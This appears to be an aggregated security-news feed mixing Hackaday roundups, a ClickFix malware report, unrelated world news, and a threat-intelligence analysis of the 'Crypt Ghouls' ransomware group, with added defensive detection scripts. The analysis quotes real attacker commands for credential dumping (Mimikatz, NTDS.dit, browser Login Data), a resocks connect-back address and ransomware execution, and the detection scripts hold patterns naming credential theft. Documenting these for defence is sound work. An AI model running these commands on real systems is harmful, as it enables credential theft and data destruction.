[ading2210] has the story of finding a pair of attack chains in Google Chrome/Chromium, where a malicious extension can access the chrome://policy page, and define a custom “browser” command to use when accessing specific pages. There are two separate vulnerabilities that can be used to pull off this trick. One is a race condition where disallowed JS code can run before it’s disabled after a page reload, and the other is a crash in the page inspector view. That’s not a page non-developers have a habit of visiting, so the browser extension just pulls a fast one on install, launching a simple page that claims that something went wrong, asking the user to press F12 to troubleshoot.

ading.dev/blog/assets/chrome_s…

Multihomed Spoofing


At this point, most of us rely on Linux for our routers and firewalls. Whether you realize it or not, it’s extremely likely that that little magical box that delivers Internet goodness to your devices is a Linux machine, running iptables as the firewall. And while iptables is excellent at its job, it does have its share of quirks. Researchers at Anvil have the lowdown on ESTABLISHED connection spoofing.

iptables, when run on the border between networks, is often set to block incoming packets by default, and allow outgoing. The catch is that you probably want responses to your requests. To allow TCP connections to work both ways, it’s common to set iptables to allow ESTABLISHED connections as well. If the IP addresses and ports all match, the packet is treated as ESTABLISHED and allowed through. So what’s missing? Unless you explicitly request it, this firewall isn’t checking that the source port is the one you expected. Packets on one interface just might get matched to a connection on a different interface and passed through. That has some particularly interesting repercussions for guest networks and the like.
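The matching logic above is easier to see in a toy model than in a rule set. The following is an added example, not Anvil's research code and not a reproduction of netfilter: a minimal connection tracker with three constructed interfaces (wan, lan, guest) and constructed packets. With strict_interface=False it accepts any packet whose addresses and ports reverse a tracked flow, whatever interface it arrived on; with strict_interface=True the flow is also bound to the interface its reply is expected on, which is the check a guest network needs.

```python
"""Simplified model of ESTABLISHED matching with and without binding a
tracked flow to the interface its reply is expected on.

Added example, not Anvil's code and not real conntrack. Interfaces,
addresses and packets are constructed for the demo.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

LAN_NET = ip_network("192.168.1.0/24")    # constructed addressing
GUEST_NET = ip_network("192.168.2.0/24")


@dataclass(frozen=True)
class Packet:
    iface: str   # interface the packet arrived on
    src: str
    sport: int
    dst: str
    dport: int


def route_iface(ip: str) -> str:
    """Interface a packet to this address leaves on (static routes for the demo)."""
    addr = ip_address(ip)
    if addr in LAN_NET:
        return "lan"
    if addr in GUEST_NET:
        return "guest"
    return "wan"


class MiniFirewall:
    """Default-deny inbound, allow new connections from lan, allow ESTABLISHED replies."""

    def __init__(self, strict_interface: bool):
        self.strict_interface = strict_interface
        # original 4-tuple -> interface on which the reply is expected
        self.flows = {}

    def handle(self, pkt: Packet) -> str:
        # 1. A new connection from the trusted LAN side: allow and start tracking,
        #    remembering which interface the reply must come back on.
        if pkt.iface == "lan" and route_iface(pkt.src) == "lan":
            self.flows[(pkt.src, pkt.sport, pkt.dst, pkt.dport)] = route_iface(pkt.dst)
            return "ACCEPT"
        # 2. Anything else must be the reverse of a tracked flow.
        reply_key = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
        expected_iface = self.flows.get(reply_key)
        if expected_iface is None:
            return "DROP"                                   # no state: default policy
        if self.strict_interface and pkt.iface != expected_iface:
            return "DROP"                                   # right 4-tuple, wrong interface
        return "ACCEPT"                                     # matched as ESTABLISHED


if __name__ == "__main__":
    outbound = Packet("lan", "192.168.1.10", 40000, "203.0.113.5", 443)
    real_reply = Packet("wan", "203.0.113.5", 443, "192.168.1.10", 40000)
    spoofed = Packet("guest", "203.0.113.5", 443, "192.168.1.10", 40000)
    for strict in (False, True):
        fw = MiniFirewall(strict_interface=strict)
        fw.handle(outbound)
        print(f"strict={strict}: real reply {fw.handle(real_reply)}, "
              f"spoof from guest {fw.handle(spoofed)}")
```

The spoofed packet from the guest interface only needs the four values it can observe or guess; it never had to traverse the WAN. Binding the state entry to an interface (in iptables terms, adding -i to the ESTABLISHED rule per interface rather than one interface-less rule) is what turns that ACCEPT into a DROP.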

Bits and Bytes


On the topic of more secure Linux installs, [Shawn Chang] has thoughts on how to run a container more securely. The easy hint is to use Podman and run rootless containers. If you want even tighter protection, there are restrictions on system calls, selinux, and a few other tricks to think about.

Check the logs! That’s the first step to looking for a breach or infection, right? But what exactly are you looking for? The folks at Trunc have thoughts on this. The basic idea is to look for logins that don’t belong, IPs that shouldn’t be there, and other specific oddities. It’s a good checklist for trouble hunting.

And finally, the playlist from DEF CON 32 is available! Among the highlights are [Cory Doctorow] talking about the future of the Internet, [HD Moore] and [Rob King] talking about SSH, and lots lots more!

youtube.com/embed/videoseries?…


hackaday.com/2024/10/18/this-w…



ClickFix malware evolves: Zoom and Google Meet turned into attack tools


In the new ClickFix campaigns, scammers lure users to fake Google Meet pages that display fake connection errors in order to spread malware capable of infecting Windows and macOS systems.

ClickFix dates back to May, when Proofpoint first reported its use by the TA571 group. The attacks used fake error messages in Google Chrome, Microsoft Word and OneDrive. Victims were asked to paste code into the PowerShell command line to fix the supposed problem, which led to their devices being infected.

Malware such as DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, Lumma Stealer and others has been distributed through this method. In July, McAfee observed an increase in the frequency of these attacks, especially in the United States and Japan.

According to a new report by Sekoia, ClickFix tactics have recently changed, with the attackers using fake Google Meet invitations and sending phishing emails aimed at shipping and logistics companies.

New tricks include fake Facebook pages and fake GitHub discussions.

Sekoia also links the recent campaigns to two groups, Slavic Nation Empire (SNE) and Scamquerteo, which are believed to be part of the cryptocurrency scam groups Marko Polo and CryptoLove.

The Google Meet attacks look particularly convincing: the attackers send emails with fake links that mimic the official ones:

  • meet[.]google[.]us-join[.]com
  • meet[.]google[.]web-join[.]com
  • meet[.]googie[.]com-join[.]us

After visiting such pages, users are shown a message about a supposed problem with the microphone or headset. An attempt to “fix” the error triggers the standard ClickFix script: the malicious PowerShell code is executed via the command line, downloading malware from the domain “googiedrivers[.]com”.

On Windows devices, Stealc or Rhadamanthys is downloaded, while on macOS, AMOS Stealer is installed as a “.DMG” file named “Launcher_v194”. Besides Google Meet, the attackers also use other platforms to distribute malware, including Zoom, fake PDF readers, fake video games and web3 projects.
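The three lookalikes above work because the familiar "meet.google" prefix is not the part of the name that decides who owns it. As an added example (not Sekoia's or the blog's tooling), here is a small Python classifier that refangs each hostname, extracts the registrable domain, and compares labels against the brand name; the suffix list is a tiny constructed stand-in for the Public Suffix List, and the trusted-domain and brand sets are assumptions for the demo.

```python
"""Classify hostnames as trusted, lookalike or unrelated with respect to a brand.

Added example, not code from the article or from Sekoia. PUBLIC_SUFFIXES is a
constructed subset of the Public Suffix List; the hostnames exercised in
__main__ are the defanged ones listed in the article plus the genuine site.
"""
PUBLIC_SUFFIXES = {"com", "net", "org", "us", "co.uk"}   # constructed subset
TRUSTED_DOMAINS = {"google.com"}                          # assumed allowlist
BRAND_LABELS = {"google"}                                 # assumed brand labels


def refang(host: str) -> str:
    """Turn a defanged name such as meet[.]google[.]com back into a hostname."""
    return host.strip().lower().replace("[.]", ".")


def registrable_domain(host: str) -> str:
    """eTLD+1 under PUBLIC_SUFFIXES, e.g. meet.google.us-join.com -> us-join.com."""
    labels = host.split(".")
    for i in range(1, len(labels)):
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[i - 1:])
    return host


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch one-character swaps like googie/google."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(host: str) -> str:
    """'trusted' if the registrable domain is allowlisted, 'lookalike' if any
    label borrows or nearly borrows the brand name, else 'unrelated'."""
    h = refang(host)
    if registrable_domain(h) in TRUSTED_DOMAINS:
        return "trusted"
    for label in h.split("."):
        for brand in BRAND_LABELS:
            if brand in label or levenshtein(label[: len(brand)], brand) <= 1:
                return "lookalike"
    return "unrelated"


if __name__ == "__main__":
    for name in ("meet.google.com", "meet[.]google[.]us-join[.]com",
                 "meet[.]google[.]web-join[.]com", "meet[.]googie[.]com-join[.]us",
                 "googiedrivers[.]com", "example.com"):
        print(f"{refang(name):32} {registrable_domain(refang(name)):16} {classify(name)}")
```

Only the first name resolves to a trusted registrable domain; the rest keep the brand in a subdomain label or misspell it by one character, and the check reports them as lookalikes regardless of how convincing the left-hand part looks. In production the same idea runs against the full Public Suffix List and a real allowlist.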

The article ClickFix malware evolves: Zoom and Google Meet turned into attack tools originally appeared on il blog della sicurezza informatica.



After 7 October, my home became a bag I carry with me


@Notizie dall'Italia e dal mondo
"I lived through my personal Nakba and I understand why thousands of Palestinians fled their homes in 1948. I made the hardest decision of my life and left Gaza, without knowing that what I carried with me would be all I would ever



SINWAR. Hamas confirms his killing. Netanyahu: “The offensive in Gaza continues”


@Notizie dall'Italia e dal mondo
Khalil Al Hayya confirmed the leader's death today, promising that Hamas will keep fighting until Israel withdraws from Gaza
The article SINWAR. Hamas confirms his killing. Netanyahu: “The offensive in Gaza continues” originally appeared on Pagine




Brazil asks Argentina to extradite dozens of coup plotters


@Notizie dall'Italia e dal mondo
The Brazilian federal police have requested the arrest of dozens of coup plotters, close to former president Bolsonaro, who fled to Argentina and other countries
The article Brazil asks Argentina to extradite dozens of coup plotters originally appeared on Pagine Esteri.



MOTU Audio Interface Resurrected After Some Reverse Engineering



These days, when something electronic breaks, most folks just throw it away and get a new one. But as hackers, we prefer to find out what the actual problem is and fix it. [Bonsembiante] took that very tack when a MOTU brand audio interface wasn’t booting. As it turns out, a bit of investigative work led to a simple and viable fix.

The previous owner had tried to get the unit fixed multiple times without success. When it ended up on [Bonsembiante]’s bench, reverse engineering was the order of the day. Based around an embedded Linux system, there was lots to poke and prod at inside, it’s just that… the system wasn’t booting, wasn’t showing up over USB or Ethernet, or doing much of anything at all.

Extracting the firmware only revealed that the firmware was actually valid, so that was a dead end. However, after some work following the boot process along in Ghidra, with some external help, the problem was revealed. Something was causing the valid firmware to fail the bootloader’s checks—and with that fixed, the unit booted. You’ll have to read the article to get the full juicy story—it’s worth it!

We’ve seen [Bonsembiante’s] work here before, when they turned an old ADSL router into a functioning guitar pedal. Video after the break.

youtube.com/embed/TRn4vVytfE4?…


hackaday.com/2024/10/18/motu-a…



Analysis of the Crypt Ghouls group: continuing the investigation into a series of attacks on Russia



Last December, we discovered a new group targeting Russian businesses and government agencies with ransomware. Further investigation into this group’s activity suggests a connection to other groups currently targeting Russia. We have seen overlaps not only in indicators of compromise and tools, but also tactics, techniques, and procedures (TTPs). Moreover, the infrastructure partially overlaps across attacks.

The group under review has a toolkit that includes utilities such as Mimikatz, XenAllPasswordPro, PingCastle, Localtonet, resocks, AnyDesk, PsExec, and others. As the final payload, the group used the well-known ransomware LockBit 3.0 and Babuk. We have dubbed the group “Crypt Ghouls”.

Delivery and persistence


It was only in two of the group’s attacks that we were able to determine the initial access vector. The attackers used a contractor’s login information to connect to the victim’s internal systems via a VPN. The VPN connections were established from IP addresses associated with a Russian hosting provider’s network and a contractor’s network. Nowadays attackers are increasingly gaining initial access through their targets’ contractors. We suspect that contractors are compromised via VPN services or unpatched vulnerabilities.

To maintain access to the system, the attackers used the NSSM and Localtonet utilities. NSSM creates and manages services on a host, while Localtonet provides an encrypted tunnel for connecting to that host from an external network. Both utilities were downloaded directly from localtonet.com:
hxxp://localtonet.com/nssm-2.24.zip
hxxp://localtonet.com/download/localtonet-win-64.zip

Harvesting login credentials

XenAllPasswordPro


The attackers employed the XenAllPasswordPro tool to harvest a range of authentication data from the target system:
cmd.exe /Q /c c:\programdata\allinone2023\XenAllPasswordPro.exe -a c:\programdata\report.html 1> \Windows\Temp\LNhkey 2>&1
cmd.exe /Q /c cmd /c rmdir /q /s c:\programdata\allinone2023 1> \Windows\Temp\HYirzI 2>&1
This utility and the path to it, “\allinone2023\”, are characteristic of this series of attacks. Following is a list of locations for XenAllPasswordPro that we have observed in various victim infrastructures.

  • c:\programdata\allinone2023\xenallpasswordpro.exe
  • c:\programdata\dbg\allinone2023\xenallpasswordpro.exe
  • c:\programdata\1c\allinone2023\xenallpasswordpro.exe
  • $user\desktop\allinone2023\xenallpasswordpro.exe
  • c:\intel\xenallpasswordpro.exe

The parent process for the commands above was wmiprvse.exe. Moreover, we found an Impacket artifact in the command-line output (the redirection of output to a randomly named file under \Windows\Temp). These are signs of using the Impacket WmiExec.py module:
C:\Windows\System32\wbem\wmiprvse.exe

In one Crypt Ghouls attack, we discovered a malicious CobInt backdoor loader. This is a telltale tool that allowed us to draw parallels with other campaigns. The CobInt downloader we encountered is a VBScript called Intellpui.vbs that executes obfuscated PowerShell code. This code, in turn, communicates with a C2 server to load the CobInt backdoor into memory.

In other cases, the attackers used RDP instead of WMI:
c:\windows\system32\rdpclip.exe
c:\programdata\1c\allinone2023\xenallpasswordpro.exe -a c:\programdata\1c\2c.txt

Additionally, we noticed that in certain attacks, the HKLM\SECURITY registry hive was being saved to a temporary folder. The hive stores the host’s security policies and the secrets managed by the Local Security Authority:
C:\Windows\System32\svchost.exe -k localService -p -s RemoteRegistry
RegSaveKey("$hklm\security","$temp\kjzcehld.tmp")

Mimikatz


We detected the use of the Mimikatz utility in some of the investigated attacks. One case involved injection of malicious code from the utility into the memory of the rundll32.exe process. In another, a Mimikatz command was used to dump the memory of the lsass.exe process, which holds various login details of authenticated users:
sekurlsa::minidump lsass.dmp
In this way, attackers used Mimikatz to extract victims’ credentials.

dumper.ps1


Crypt Ghouls ran an open-source PowerShell script that allowed them to dump Kerberos tickets from the LSA cache. The attackers renamed it to disguise it as a Group Policy script.
.\gpo_compliance.ps1

MiniDump Tool


MiniDump Tool is a utility designed to create a memory dump of a specified process. It helped Crypt Ghouls to extract login credentials from the memory of lsass.exe. The attackers initiated this by running the following command:
T.exe [lsass_pid] [lsass_pid]
The first argument is the process ID (PID). The second argument is the file name and directory to save the dump of the selected process to.

The MiniDump Tool creates a driver at the following path:
C:\Users\[username]\AppData\Local\Temp\kxxxxxxx.sys
Next, it runs the driver and passes it a control code to read the memory of the process whose identifier is specified as the first argument, then it saves the dump on the system, in this case in a file in the current directory that uses the process ID as its name.

Login credentials from browsers


Crypt Ghouls also copied files containing credentials stored in browsers to a temporary directory:
cmd.exe /Q /c copy "C:\Users\[username]\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" "C:\Windows\Temp\1713909129.8364425"
cmd.exe /Q /c copy "C:\Users\[username]\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Windows\Temp\1713909173.8739672"
cmd.exe /Q /c copy "C:\Users\[username]\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" "C:\Windows\Temp\1713909181.5850394"
The commands on the hosts were run via WMI.

The attackers then used PowerShell to request a list of local users (parent process > child process):
c:\windows\system32\wbem\wmiprvse.exe > cmd.exe /Q /c powershell.exe "Get-LocalUser | Select name" 1> \Windows\Temp\qnLJbp 2>&1

NTDS.dit dump


Crypt Ghouls connected to the domain controller with compromised credentials via WMI. After establishing the connection, they tried to save the NTDS.dit dump. The attackers leveraged an existing scheduler task to obtain the dump. They modified the task four times. First, they obtained the NTDS.dit dump with the Ntdsutil utility. Then they archived the folder containing the dump and deleted the folder. The final change to the scheduler task restored its original value.
powershell.exe out-file -inputobject (ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\programdata\activedirectory' q q) -encoding utf8 -filepath c:\programdata\microsoft\vault\dabbf27c-37ef-9946-a3d3-7aaaebce7577
powershell.exe out-file -inputobject (7zr.exe a c:\programdata\ad.7z c:\programdata\activedirectory) -encoding utf8 -filepath c:\programdata\microsoft\vault\4c6b60eb-eafe-ab9b-adfa-ed24b2398e0c
powershell.exe out-file -inputobject (cmd /c rmdir /q /s c:\programdata\activedirectory) -encoding utf8 -filepath c:\programdata\microsoft\vault\a5ad25f1-f569-6247-0722-ad6fe54e350f
The 7-Zip utility was also downloaded from GitHub:
github.com/ip7z/7zip/releases/…
However, we did not detect any further data exfiltration after the archiving.
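The command lines quoted from the XenAllPasswordPro section through the NTDS.dit section share a handful of stable features (the allinone2023 folder, cmd.exe /Q /c with output redirected to a random file under \Windows\Temp, the "Login Data" copies, sekurlsa::, Get-LocalUser, ntdsutil with "ac i ntds" "ifm", and cmd.exe launched by the WMI provider host). As an added example, not Kaspersky's detection logic, here is a Python hunt over process-creation events that encodes those features as rules. The events are constructed from the report's command lines; host names, parent images, the [guid] placeholder and the one benign event are assumptions for the demo.

```python
"""Hunt process-creation telemetry for the command-line patterns described in
the credential-harvesting sections above.

Added example, not Kaspersky's code. SAMPLE_EVENTS is constructed from the
report's command lines; hosts, parents and the benign event are invented.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    parent_image: str
    image: str
    cmdline: str


# (rule name, pattern over the command line); all derived from the quoted commands
CMDLINE_RULES = [
    ("XenAllPasswordPro or its allinone2023 folder",
     re.compile(r"xenallpasswordpro\.exe|\\allinone2023\\", re.I)),
    ("wmiexec-style output redirection to Windows\\Temp",
     re.compile(r"cmd\.exe /Q /c .*1>\s*\\Windows\\Temp\\\w+ 2>&1", re.I)),
    ("browser 'Login Data' copied to a temp folder",
     re.compile(r'copy\s+".*\\Login Data"\s+".*\\Temp\\', re.I)),
    ("Mimikatz sekurlsa module",
     re.compile(r"sekurlsa::", re.I)),
    ("local user enumeration",
     re.compile(r"Get-LocalUser", re.I)),
    ("ntdsutil IFM (NTDS.dit) dump",
     re.compile(r"ntdsutil(\.exe)?\s+'?ac i ntds'?\s+'?ifm'?", re.I)),
]


def hunt(events):
    """Return (host, rule, cmdline) for every rule each event triggers."""
    hits = []
    for ev in events:
        parent = ev.parent_image.lower().rsplit("\\", 1)[-1]
        child = ev.image.lower().rsplit("\\", 1)[-1]
        # parent/child relation seen throughout the report: WMI provider host -> shell
        if parent == "wmiprvse.exe" and child in {"cmd.exe", "powershell.exe"}:
            hits.append((ev.host, "shell spawned by WMI provider host", ev.cmdline))
        for name, pattern in CMDLINE_RULES:
            if pattern.search(ev.cmdline):
                hits.append((ev.host, name, ev.cmdline))
    return hits


SAMPLE_EVENTS = [
    ProcEvent("ws-01", r"C:\Windows\System32\wbem\wmiprvse.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /Q /c c:\programdata\allinone2023\XenAllPasswordPro.exe -a c:\programdata\report.html 1> \Windows\Temp\LNhkey 2>&1"),
    ProcEvent("ws-01", r"C:\Windows\System32\wbem\wmiprvse.exe", r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /Q /c copy "C:\Users\[username]\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Windows\Temp\1713909173.8739672"'),
    ProcEvent("ws-02", r"C:\Windows\System32\rdpclip.exe", r"c:\programdata\1c\allinone2023\xenallpasswordpro.exe",
              r"c:\programdata\1c\allinone2023\xenallpasswordpro.exe -a c:\programdata\1c\2c.txt"),
    ProcEvent("dc-01", r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe out-file -inputobject (ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\programdata\activedirectory' q q) -encoding utf8 -filepath c:\programdata\microsoft\vault\[guid]"),
    ProcEvent("ws-03", r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
              r"notepad.exe C:\Users\alice\notes.txt"),   # constructed benign event
]


if __name__ == "__main__":
    for host, rule, cmdline in hunt(SAMPLE_EVENTS):
        print(f"{host}: {rule}\n    {cmdline}")
```

The first event fires three rules at once (tool path, redirection artifact, WMI parent), which is the kind of stacking that makes a weak indicator such as "cmd.exe under wmiprvse.exe" worth keeping: alone it also matches legitimate management software, combined with the others it is specific to this activity. The benign notepad event triggers nothing.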

Network reconnaissance and spread


Crypt Ghouls used the PingCastle utility (MD5: F4A84D6F1CAF0875B50135423D04139F) to collect information about the infrastructure of the domain they resided in. Additionally, the attackers periodically scanned the network using the legitimate utility SoftPerfect Network Scanner to identify open ports and network shares.

As we mentioned above, the attackers used the WmiExec.py Impacket module for network navigation. We found that two of the targets had PAExec, a remote command tool, running on their systems at some point:
c:\windows\paexec-[xxxxx]-[source_host_redacted].exe -service cmd

Infrastructure


Crypt Ghouls uses several remote access utilities. AnyDesk was the most commonly used tool according to our research, but the attackers employed a variety of other methods as well. The table below presents the names of the utilities and the directories where they were found.

Name        Directory
AnyDesk     C:\Users\[redacted]\Downloads\AnyDesk.exe
Localtonet  C:\Windows\Temp\localtonet.exe
resocks     /usr/sbin/xfs-modules

The IP addresses used for remote connections to AnyDesk and Localtonet belonged to a Surfshark VPN subnet.

Resocks is a reverse SOCKS5 proxy for tunneling traffic. While investigating this group’s activity, we found a proxy sample that was configured to use the IP address 91.142.73[.]178, which is part of the hosting provider VDSina’s network.

Below are the notable parameters of the resocks sample, which provide additional context for the research:
-X main.defaultConnectBackAddress=91.142.73[.]178 -X main.defaultConnectionKey=CzKDvHM8UGE/QtjuF2SSkJzaVmRpjNipdWlbTzFry6o

DLL sideloading


The malicious actor used the DLL sideloading technique by placing a legitimate Windows installer management application, dism.exe, and a malicious loader, dismcore.dll, in the same folder: c:\ProgramData\oracle\. The dismcore.dll loader attempted to locate the file odbcconf.xml, which contained the payload, but we were unable to retrieve that file.

File encryption


The attackers encrypted data with publicly available versions of the popular LockBit 3.0 (for Windows systems) and Babuk (for Linux) malware. The LockBit sample we analyzed was configured with commands to encrypt local drives, terminate specific processes and services, disable Windows Defender, and delete event logs. The ransomware added system directories, as well as a folder named intel where the attackers loaded tools to harvest credentials, to the encryption exclusions list.

Figure: a snippet of the LockBit 3.0 sample’s configuration

We noticed something strange about how a victim’s files were encrypted. First, LockBit encrypted files with specific extensions, as defined in its sample configuration. These are the files that the attackers may find most valuable. Besides these, the malware encrypts files in the recycle bin while inserting random characters in these. Beyond the primary algorithm, we found a cycle that systematically renamed the original file in the recycle bin. This process iterated through every letter of the English alphabet, continuing until it reached the last one. This type of encryption makes it really hard, or even impossible, to recover the user’s files.

Figure: the file renaming cycle

Below is an example of how this appears in logs:
File Renamed c:\$recycle.bin\[redacted]\desktop.ini c:\$recycle.bin\[redacted]\aaaaaaaaaaa
File Renamed c:\$recycle.bin\[redacted]\aaaaaaaaaaa c:\$recycle.bin\[redacted]\bbbbbbbbbbb
File Renamed c:\$recycle.bin\[redacted]\bbbbbbbbbbb c:\$recycle.bin\[redacted]\ccccccccccc
File Renamed c:\$recycle.bin\[redacted]\ccccccccccc c:\$recycle.bin\[redacted]\ddddddddddd
The algorithm then attempts to delete the last version of the file, c:\$recycle.bin\[redacted]\zzzzzzzzzzz.
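The renaming cycle above has a very regular signature: a chain of renames inside $recycle.bin in which each new name is a run of a single letter and each step advances one letter through the alphabet. As an added example (not Kaspersky's detection code), here is a Python detector for that chain over "File Renamed <old> <new>" log lines. The log format is assumed from the excerpt; the sample lines are constructed from it, keeping [redacted] as a placeholder and adding one benign rename.

```python
"""Detect the recycle-bin renaming cycle shown in the log excerpt above.

Added example, not Kaspersky's code. The 'File Renamed <old> <new>' format is
assumed from the excerpt; SAMPLE_LOG is constructed from it plus one benign line.
"""
import re

RENAME_RE = re.compile(r"^File Renamed\s+(?P<old>\S+)\s+(?P<new>\S+)\s*$", re.IGNORECASE)
RECYCLE_BIN_RE = re.compile(r"\\\$recycle\.bin\\", re.IGNORECASE)

SAMPLE_LOG = r"""
File Renamed c:\users\alice\report.docx c:\users\alice\report-final.docx
File Renamed c:\$recycle.bin\[redacted]\desktop.ini c:\$recycle.bin\[redacted]\aaaaaaaaaaa
File Renamed c:\$recycle.bin\[redacted]\aaaaaaaaaaa c:\$recycle.bin\[redacted]\bbbbbbbbbbb
File Renamed c:\$recycle.bin\[redacted]\bbbbbbbbbbb c:\$recycle.bin\[redacted]\ccccccccccc
File Renamed c:\$recycle.bin\[redacted]\ccccccccccc c:\$recycle.bin\[redacted]\ddddddddddd
""".strip().splitlines()


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def is_letter_run(name: str) -> bool:
    """True for names like 'aaaaaaaaaaa': one ASCII letter repeated."""
    return name.isascii() and name.isalpha() and len(set(name.lower())) == 1


def find_rename_chains(lines, min_steps: int = 3):
    """Return chains of consecutive renames inside $recycle.bin whose targets
    are single-letter runs that advance through the alphabet one step at a time."""
    chains, current = [], []

    def flush():
        if len(current) >= min_steps:
            chains.append({"first": current[0][0], "last": current[-1][1], "steps": len(current)})
        current.clear()

    for line in lines:
        m = RENAME_RE.match(line.strip())
        if not m:
            continue
        old, new = m.group("old"), m.group("new")
        new_base = basename(new)
        if not (RECYCLE_BIN_RE.search(new) and is_letter_run(new_base)):
            flush()
            continue
        if current:
            prev_new = current[-1][1]
            # the chain continues only if this rename picks up the previous target
            # and moves to the next letter of the alphabet
            next_letter = chr(ord(basename(prev_new)[0].lower()) + 1)
            if old.lower() != prev_new.lower() or new_base[0].lower() != next_letter:
                flush()
        current.append((old, new))
    flush()
    return chains


if __name__ == "__main__":
    for chain in find_rename_chains(SAMPLE_LOG):
        print(f"{chain['steps']} steps: {chain['first']} -> ... -> {chain['last']}")
```

With min_steps=3 the benign rename is ignored and the four recycle-bin renames are reported as one chain starting from desktop.ini. Ordinary software never walks a file through a, b, c, d names in sequence, so the chain is a high-confidence signal even before the encryption of the real targets is noticed.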

The attackers leave a ransom note with a link containing their ID in the Session messaging service for future contact:

Figure: a LockBit 3.0 ransom note

Session supports end-to-end encryption, which minimizes the risk of data breaches. The developers claim their messaging service is built to guarantee complete privacy. Session has been used by other ransomware groups, such as GhostLocker, SEXi, and MorLock, in their attacks.

Additionally, attackers targeted ESXi servers with the Babuk ransomware. They would connect to the ESXi server via SSH, upload Babuk, and initiate the encryption process for the files within the virtual machines:
/tmp/lock.out "/vmfs/volumes/[redacted]"
We believe the goal of the attackers was to disrupt the targeted organizations’ operations, besides financial gain.

Links to other groups


We are seeing a lot of overlap in the tools and techniques used by cybercriminals targeting Russian businesses and government agencies. Below, we outline the key similarities we found in attacks by different groups.

MorLock


MorLock activities, as investigated by F.A.C.C.T., share many features with several of the attacks we analyzed for this report. The groups share most of the tools they use: SoftPerfect Network Scanner, XenAllPasswordPro, AnyDesk, PingCastle, Localtonet, NSSM, resocks, LockBit 3.0, and Babuk.

The file and folder names used in attacks by both groups also show similarities. Thus we found a resocks utility named “xfs-healthcheck”, a name that follows the same template as the resocks names on the list of indicators published by F.A.C.C.T.: [xxx]-healthcheck. We noticed a further similarity when studying the XenAllPasswordPro utility: in MorLock attacks, it was located in a directory named “allinone2023”.

Furthermore, we checked the MorLock infrastructure as reported by F.A.C.C.T., only to find that the group also used Surfshark VPN and the VDSina hosting services provider.

BlackJack


While investigating the utilities used in Crypt Ghouls attacks, we found an overlap with the toolkit employed by the BlackJack group, which also used XenAllPasswordPro. This caught our attention, as XenAllPasswordPro is not the most popular tool among cybercriminals despite being freely available.

Twelve


We have seen XenAllPasswordPro used in attacks by Twelve too. Furthermore, we discovered Intellpui.vbs, a loader for CobInt, also used by Twelve, on one of the systems attacked by Crypt Ghouls.

Shedding Zmiy


Shedding Zmiy is a group associated with the (Ex)Cobalt activity cluster. We found a further overlap in a report by Solar 4RAYS on incidents related to this group, namely the use of DLL sideloading with the dismcore.dll malicious loader. The report mentioned other familiar utilities and malware: resocks, SoftPerfect Network Scanner, and CobInt. In addition, Shedding Zmiy used VDSina to host its command-and-control servers.

The similarities between the groups described above led to the conclusion that these attacks overlap with the activity of Crypt Ghouls. Our analysis of cybercriminal tools and tactics suggests that different groups may be collaborating, sharing resources, or exchanging intelligence. Other vendors have found evidence of the (Ex)Cobalt cluster members participating in these groups’ activities, and our analysis confirms this. Right now, we cannot say for sure that these campaigns are connected, but we anticipate their number will increase further. We will continue to monitor activity targeting Russian organizations.

Victims


Russian government agencies as well as mining, energy, finance, and retail companies have fallen victim to the Crypt Ghouls group.

Conclusion


Crypt Ghouls is another group attacking Russia. Cybercriminals are leveraging compromised credentials, often belonging to subcontractors, and popular open-source tools. These include modified configurations of the LockBit 3.0 and Babuk ransomware, whose builders and source code are publicly available. As the number of attackers using leaked builds increases, identifying the perpetrators of threats becomes increasingly difficult. The shared toolkit used in attacks on Russia makes it challenging to pinpoint the specific hacktivist groups involved. In the attacks carried out by the Crypt Ghouls, we have identified components of infrastructure and a variety of popular tools that are also used by many other groups. This suggests that the current actors are not only sharing knowledge but also their toolkits. All of this only makes it more difficult to identify specific malicious actors behind the wave of attacks directed at Russian organizations.

Indicators of compromise


Note: Network addresses specified in this section are valid at the time of publishing, but may change over time.

SHA256:

01fba22c3e6cf11805afe4ba2f7c303813c83486e07b2b418bf1b3fabfd2544e  dismcore.dll
3edb6fb033cc00c016520e2590e2888e393ad5ed725e853eea3bc86cee3b28b8  resocks
5e1e3bf6999126ae4aa52146280fdb913912632e8bac4f54e98c58821a307d32  dumper.ps1
92804faaab2175dc501d73e814663058c78c0a042675a8937266357bcfb96c50  Mimikatz
dec147d7628d4e3479bc0ff31413621fb4b1b64a618469a9402a42816650f92b  Lockbit 3.0
a54519b7530039b9fba9a4143bf549b67048f441bbebf9f8d5cff1e539752189  Lockbit 3.0
56682344aa1dc0a0a5b0d26bd3a8dfe8ceb8772d6cd9e3f8cbd78ca78fe3c2ab  Babuk
a27d900b1f94cb9e970c5d3b2dcf6686b02fb722eda30c85acc05ba55fdabfbc  MiniDump Tool
eb59a4b1925fdf36dbe41091cb7378291a9116d8150118e4f449cbd1147e204e  kxxxxxxx.sys

File paths:
C:\ProgramData\oracle\dismcore.dll
odbcconf.xml – payload
C:\Users\User\Downloads\dumper.ps1 – dumper.ps1
C:\Users\User\Desktop\x86\x64\mimikatz.exe
C:\programdata\1c\allinone2023\xenallpasswordpro.exe
C:\programdata\allinone2023\xenallpasswordpro.exe
C:\programdata\dbg\allinone2023\xenallpasswordpro.exe
C:\programdata\1c\allinone2023\xenallpasswordpro.exe
$user\desktop\allinone2023\xenallpasswordpro.exe
